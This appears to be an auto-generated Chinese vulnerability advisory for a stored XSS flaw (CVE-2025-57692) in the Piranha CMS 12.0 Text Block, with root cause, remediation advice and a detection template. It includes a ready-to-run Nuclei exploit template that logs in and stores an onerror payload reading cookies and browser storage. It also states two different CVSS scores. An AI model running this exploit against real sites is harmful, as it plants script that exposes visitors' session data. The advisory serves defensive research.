[webapps] Piranha CMS 12.0 - Stored XSS in Text Block
CVE-2025-57692
Piranha CMS 12.0 的文本块组件存在存储型跨站脚本漏洞,攻击者可注入恶意JavaScript代码。
Medium · CVSS 6.1📋 漏洞基础信息
| CVE | CVE-2025-57692 |
|---|---|
| 漏洞类型 | 存储型跨站脚本 (Stored XSS) |
| 受影响版本 | Piranha CMS 12.0 |
| 危害等级 | Medium · CVSS 6.1 |
| 发布日期 | 2026-02-02 |
| 提交者 | Chidubem Chukwu (Terminal Venom) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
在文本块(Text Block)的编辑或保存过程中,用户输入的内容未经过充分的HTML转义或过滤,导致攻击者提交的XSS payload被直接存储并在页面渲染时执行。
🎯 攻击场景
1. 攻击者登录Piranha CMS后台或具有文本块编辑权限的账号。 2. 在文本块编辑器中输入包含恶意JavaScript代码的内容,例如`<script>alert('XSS')</script>`。 3. 保存文本块,payload被存储到数据库。 4. 任何浏览该文本块页面的用户(包括管理员)都会触发脚本执行,导致信息窃取、会话劫持等后果。
💥 漏洞影响
攻击者可以执行任意JavaScript代码,导致管理员或用户会话被劫持、敏感信息泄露(如Cookie、页面内容)、或进行钓鱼攻击。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-57692-exploit
info:
name: Piranha CMS 12.0 - Stored XSS Exploit
author: terminal-venom
severity: medium
description: Exploits a stored XSS vulnerability in Piranha CMS 12.0 by injecting a payload into the Text content block of a Standard Page.
reference:
- https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
- https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2025-57692
tags: cve,cve2025,piranha-cms,xss,authenticated
metadata:
max-request: 3
variables:
username: "{{username}}"
password: "{{password}}"
page_title: "XSS-Test-{{rand_text_alphanumeric(5)}}"
xss_payload: |
<img src="x" onerror="
alert(
'Cookies: ' + document.cookie + '\n' +
'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
'URL: ' + window.location.href + '\n' +
'User Agent: ' + navigator.userAgent + '\n' +
'Time: ' + new Date().toLocaleString()
)
" />
http:
- raw:
- |
GET /manager/login HTTP/1.1
Host: {{Hostname}}
- |
POST /manager/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: {{cookie}}
__RequestVerificationToken={{token}}&UserName={{username}}&Password={{password}}&RememberMe=false
- |
POST /manager/pages HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Cookie: {{cookie_authenticated}}
{"Title":"{{page_title}}","Content":[{"Type":"TextBlock","Value":"{{xss_payload}}"}]}
cookie-reuse: true
extractors:
- type: regex
name: token
part: body
internal: true
group: 1
regex:
- '__RequestVerificationToken.*?value=([A-Za-z0-9_-]+)'
- type: regex
name: cookie
part: header
internal: true
group: 1
regex:
- 'Set-Cookie:\s(.+?);'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Pages"
- "saved successfully"
condition: or
- type: status
status:
- 200
- 302
- 201🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-57692-detection
info:
name: Piranha CMS 12.0 - Stored XSS Detection
author: terminal-venom
severity: medium
description: Detects if the target is running Piranha CMS version 12.0 or earlier, which is vulnerable to stored XSS in the Text content block.
reference:
- https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
- https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2025-57692
tags: cve,cve2025,piranha-cms,xss,authenticated
http:
- raw:
- |
GET /manager/login HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Piranha CMS"
- "manager"
condition: and
- type: word
part: header
words:
- "text/html"
extractors:
- type: regex
part: body
group: 1
regex:
- 'Piranha\.Version=(\d+\.\d+)'
- 'Piranha CMS v(\d+\.\d+)'🛡️ 修复建议
升级至Piranha CMS 12.1或更高版本;临时缓解措施包括:在web应用防火墙(WAF)中配置规则对文本块输入进行HTML实体编码,或由开发人员在服务端对用户输入进行严格的HTML转义(如使用Html.Encode)。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2025-57692
- https://github.com/PiranhaCMS/piranha.core/issues/1300
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:16 | 来源: Exploit-DB